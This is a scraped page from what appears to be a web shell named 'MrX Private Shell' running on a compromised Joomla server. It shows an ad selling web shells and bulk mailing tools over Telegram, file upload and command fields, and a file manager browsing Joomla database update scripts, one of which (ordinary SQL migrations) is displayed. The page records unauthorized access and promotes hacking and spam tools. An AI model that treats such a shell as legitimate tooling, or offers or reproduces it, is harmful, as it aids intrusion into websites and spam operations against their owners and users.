__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
-- From 4.0.0-2019-07-14.sql
-- The following 3 statements were modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE "#__contact_details" DROP COLUMN "xreference" /** CAN FAIL **/;
ALTER TABLE "#__content" DROP COLUMN "xreference" /** CAN FAIL **/;
ALTER TABLE "#__newsfeeds" DROP COLUMN "xreference" /** CAN FAIL **/;
-- From 4.0.0-2019-07-16.sql
-- This has been removed as com_csp has been removed from the final build

-- From 4.0.0-2019-08-03.sql
-- The following two statements were modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE "#__update_sites" ADD COLUMN "checked_out" bigint DEFAULT 0 NOT NULL /** CAN FAIL **/;
ALTER TABLE "#__update_sites" ADD COLUMN "checked_out_time" timestamp without time zone DEFAULT NULL /** CAN FAIL **/;

-- From 4.0.0-2019-08-20.sql
-- The following two statements were modified for 4.1.1 by adding the "/** CAN FAIL **/" installer hint.
-- See https://github.com/joomla/joomla-cms/pull/37156
ALTER TABLE "#__content_frontpage" ADD COLUMN "featured_up" timestamp without time zone /** CAN FAIL **/;
ALTER TABLE "#__content_frontpage" ADD COLUMN "featured_down" timestamp without time zone /** CAN FAIL **/;

-- From 4.0.0-2019-08-21.sql
INSERT INTO "#__extensions" ("package_id", "name", "type", "element", "folder", "client_id", "enabled", "access", "protected", "manifest_cache", "params", "custom_data", "checked_out", "checked_out_time", "ordering", "state") VALUES
(0, 'plg_webservices_banners', 'plugin', 'banners', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_config', 'plugin', 'config', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_contact', 'plugin', 'contact', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_languages', 'plugin', 'languages', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_menus', 'plugin', 'menus', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_messages', 'plugin', 'messages', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_modules', 'plugin', 'modules', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_newsfeeds', 'plugin', 'newsfeeds', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_plugins', 'plugin', 'plugins', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_privacy', 'plugin', 'privacy', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_redirect', 'plugin', 'redirect', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_tags', 'plugin', 'tags', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_templates', 'plugin', 'templates', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0),
(0, 'plg_webservices_users', 'plugin', 'users', 'webservices', 0, 1, 1, 0, '', '{}', '', 0, '1970-01-01 00:00:00', 0, 0);

-- From 4.0.0-2019-09-13.sql
-- The following statement was modified for 4.1.1 by adding the "ON CONFLICT" clause.
-- See https://github.com/joomla/joomla-cms/pull/37156
INSERT INTO "#__menu" ("menutype", "title", "alias", "note", "path", "link", "type", "published", "parent_id", "level", "component_id", "checked_out", "checked_out_time", "browserNav", "access", "img", "template_style_id", "params", "lft", "rgt", "home", "language", "client_id", "publish_up", "publish_down")
SELECT 'main', 'com_messages_manager', 'Private Messages', '', 'Messaging/Private Messages', 'index.php?option=com_messages&view=messages', 'component', 1, 10, 2, "extension_id", 0, NULL, 0, 0, 'class:messages-add', 0, '', 18, 19, 0, '*', 1, NULL, NULL FROM "#__extensions" WHERE "name" = 'com_messages'
ON CONFLICT DO NOTHING;

Filemanager

Name Type Size Permission Actions
4.0.0-2018-03-05.sql File 6.7 KB 0664
4.0.0-2018-05-15.sql File 8.54 KB 0664
4.0.0-2018-07-19.sql File 1.92 KB 0664
4.0.0-2018-07-29.sql File 12.82 KB 0664
4.0.0-2018-08-29.sql File 1.34 KB 0664
4.0.0-2019-03-09.sql File 3.26 KB 0664
4.0.0-2019-03-30.sql File 582 B 0664
4.0.0-2019-04-15.sql File 899 B 0664
4.0.0-2019-04-22.sql File 1.92 KB 0664
4.0.0-2019-05-20.sql File 1.74 KB 0664
4.0.0-2019-06-29.sql File 4.18 KB 0664
4.0.0-2019-07-13.sql File 13.75 KB 0664
4.0.0-2019-09-13.sql File 4.05 KB 0664
4.0.0-2019-09-22.sql File 1.94 KB 0664
4.0.0-2019-10-06.sql File 7.29 KB 0664
4.0.0-2019-10-17.sql File 1.06 KB 0664
4.0.0-2020-02-02.sql File 1.78 KB 0664
4.0.0-2020-03-10.sql File 1.46 KB 0664
4.0.0-2020-03-25.sql File 6.08 KB 0664
4.0.0-2020-05-29.sql File 7.5 KB 0664
4.0.0-2020-08-01.sql File 414 B 0664
4.0.0-2020-09-27.sql File 1.54 KB 0664
4.0.0-2020-12-20.sql File 6.15 KB 0664
4.0.0-2021-04-22.sql File 1.35 KB 0664
4.0.0-2021-04-27.sql File 2.04 KB 0664
4.0.0-2021-05-30.sql File 1.59 KB 0664
4.0.0-2021-06-04.sql File 226 B 0664
4.0.0-2021-08-13.sql File 914 B 0664
4.0.0-2021-08-17.sql File 1.17 KB 0664
4.0.3-2021-09-04.sql File 1.88 KB 0664
4.0.3-2021-09-05.sql File 607 B 0664
4.0.6-2021-12-23.sql File 125 B 0664
4.1.0-2021-11-20.sql File 4.68 KB 0664
4.1.0-2021-11-28.sql File 429 B 0664
4.1.0-2021-12-29.sql File 329 B 0664
4.1.0-2022-01-08.sql File 205 B 0664
4.1.0-2022-01-19.sql File 337 B 0664
4.1.0-2022-01-24.sql File 323 B 0664
4.1.1-2022-02-20.sql File 106 B 0664
4.1.3-2022-04-07.sql File 486 B 0664
4.1.3-2022-04-08.sql File 124 B 0664
4.2.0-2022-05-15.sql File 3.06 KB 0664
4.2.0-2022-06-19.sql File 356 B 0664
4.2.0-2022-06-22.sql File 295 B 0664
4.2.0-2022-07-07.sql File 473 B 0664
4.2.1-2022-08-23.sql File 258 B 0664
4.2.3-2022-09-07.sql File 217 B 0664
4.2.7-2022-12-29.sql File 534 B 0664
index.html File 31 B 0664
Filemanager